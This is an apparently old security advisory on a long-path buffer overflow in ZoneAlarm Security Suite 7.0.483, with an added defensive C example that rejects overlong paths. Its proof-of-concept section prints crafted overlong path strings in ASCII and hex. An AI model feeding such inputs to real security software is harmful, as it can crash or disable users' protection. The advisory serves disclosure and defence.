Application: ZoneAlarm Security Suite
OS: Windows XP (all patches up to date)
------------------------------------------------------
1 - Description
2 - Vulnerability
3 - POC/EXPLOIT
------------------------------------------------------
Description
ZoneAlarm is a well-known firewall. The "Security Suite" edition adds further tools such as antivirus, antispam and so on.
Details of the version
ZoneAlarm Security Suite version: 7.0.483.000
TrueVector version: 7.0.483.000
Driver version: 7.0.483.000
Anti-virus engine version: 3
Antivirus engine version: 5.0.1.85
Anti-virus signature DAT file version: 915051681
Anti-spyware engine version: 5.0.189.0
Anti-spyware signature DAT file version: 01.200801.3195
AntiSpam version: 5.0.6.8903
------------------------------------------------------
Vulnerability
The vulnerability occurs because the program cannot analyze very long paths.
This causes a buffer overflow with the possibility of code execution.
Malware could exploit the flaw, for instance, to leave the system without protection.
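
An added illustration, not part of the original advisory and not ZoneAlarm code: a path-joining routine of the kind a file scanner needs, written so that an overlong path is rejected instead of overflowing a fixed buffer. The function names and the 260-byte capacity (Windows MAX_PATH) are assumptions; the advisory does not describe the vulnerable code or its buffer size.

```c
#include <stdio.h>
#include <string.h>

/* Assumed capacity: Windows MAX_PATH. The advisory does not state the real buffer size. */
#define SCAN_PATH_MAX 260

enum { PATH_OK = 0, PATH_TOO_LONG = -1, PATH_BAD_ARG = -2 };

/* Build "dir\name" in out (out_cap bytes). All lengths are validated before
 * any byte is copied, so an overlong input is rejected, never truncated and
 * never written past the buffer. */
int scan_path_join(char *out, size_t out_cap, const char *dir, const char *name)
{
    if (!out || out_cap == 0 || !dir || !name)
        return PATH_BAD_ARG;
    out[0] = '\0';                       /* defined result on every failure */

    size_t dlen = strlen(dir), nlen = strlen(name);
    size_t sep = (dlen > 0 && dir[dlen - 1] != '\\') ? 1 : 0;

    /* Compare by subtraction from the capacity so the sum cannot wrap. */
    if (dlen >= out_cap || sep + 1 > out_cap - dlen ||
        nlen > out_cap - dlen - sep - 1)
        return PATH_TOO_LONG;

    memcpy(out, dir, dlen);
    if (sep)
        out[dlen++] = '\\';
    memcpy(out + dlen, name, nlen);
    out[dlen + nlen] = '\0';
    return PATH_OK;
}

/* Constructed input shaped like the advisory's second string:
 * a few 0x85 bytes followed by a long run of 'A'. Returns the join status. */
int demo_overlong_name(void)
{
    char name[400], out[SCAN_PATH_MAX];
    memset(name, 'A', sizeof name - 1);
    memset(name, 0x85, 11);
    name[sizeof name - 1] = '\0';
    return scan_path_join(out, sizeof out, "C:\\scan", name);
}

int main(void)
{
    /* A caller must report a rejected path as "not scanned" rather than
     * silently skipping it, or long paths become a way to avoid scanning. */
    printf("overlong name -> %d\n", demo_overlong_name());
    return 0;
}
```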
------------------------------------------------------
POC/EXPLOIT
A video proof of concept can be viewed here:
http://www.fileden.com/files/2008/9/11/2091525/zonealarm.swf
Strings
ASCII: =B7 =85 AAAAAAAAAAAAAAAAAAA =B7 =85 AAAAAAAAAAAAAAAAAAA =B7 =85 AAAAAAAAAAAAAAAAAAA =B7 =B7 =85 AAAAAAAAAAAAAAAAAAA =B7 =85 AAAAAAAAAAAAAAAAAAA =B7 =85 AAAAAAAAAAAAAAAAAAA =B7 =B7 =85 A =B7 =85 AAAAAAAAAAAAAAAAAAA =B7 =85 AAAAAAAAAAAAAAAAAAA
HEX : b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
ASCII: =85=85=85=85=85=85=85=85=85=85=85AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=85=85=85=85AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
HEX: 85 85 85 85 85 85 85 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
------------------------------------------------------
Juan Pablo Lopez Yacubian